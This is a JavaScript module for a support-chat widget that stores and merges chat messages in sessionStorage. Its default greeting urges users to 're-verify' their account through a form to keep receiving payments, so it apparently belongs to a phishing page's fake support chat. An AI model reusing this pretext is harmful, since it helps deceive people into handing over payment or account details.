const DEFAULT_GREETING =
  "Hello. To continue receiving payments and using our platform, your account needs to be re-verified. We're updating our payment system to improve security and speed. To complete verification, please proceed within the form. If you need help, our support team is available 24/7.";

function storageKey(sessionId) {
  return `support_chat_${sessionId}`;
}

export function defaultSupportMessages() {
  return [{ role: 'system', text: DEFAULT_GREETING }];
}

export function loadSupportMessages(sessionId) {
  if (!sessionId || typeof sessionStorage === 'undefined') return defaultSupportMessages();
  try {
    const raw = sessionStorage.getItem(storageKey(sessionId));
    if (!raw) return defaultSupportMessages();
    const parsed = JSON.parse(raw);
    if (!Array.isArray(parsed) || parsed.length === 0) return defaultSupportMessages();
    return parsed.map((m) => ({
      role: m.role || 'system',
      text: m.text || '',
      id: m.id,
      photoUrl: m.photoUrl || null,
    }));
  } catch {
    return defaultSupportMessages();
  }
}

export function saveSupportMessages(sessionId, messages) {
  if (!sessionId || typeof sessionStorage === 'undefined' || !Array.isArray(messages)) return;
  try {
    const payload = messages.map((m) => ({
      role: m.role,
      text: m.text,
      id: m.id,
    }));
    sessionStorage.setItem(storageKey(sessionId), JSON.stringify(payload));
  } catch {
    /* ignore quota errors */
  }
}

export function mergeSupportMessages(existing, incoming) {
  const merged = [...existing];
  const ids = new Set(merged.filter((m) => m.id != null).map((m) => m.id));
  for (const msg of incoming) {
    if (msg.id != null) {
      if (ids.has(msg.id)) continue;
      ids.add(msg.id);
    }
    merged.push(msg);
  }
  return merged;
}
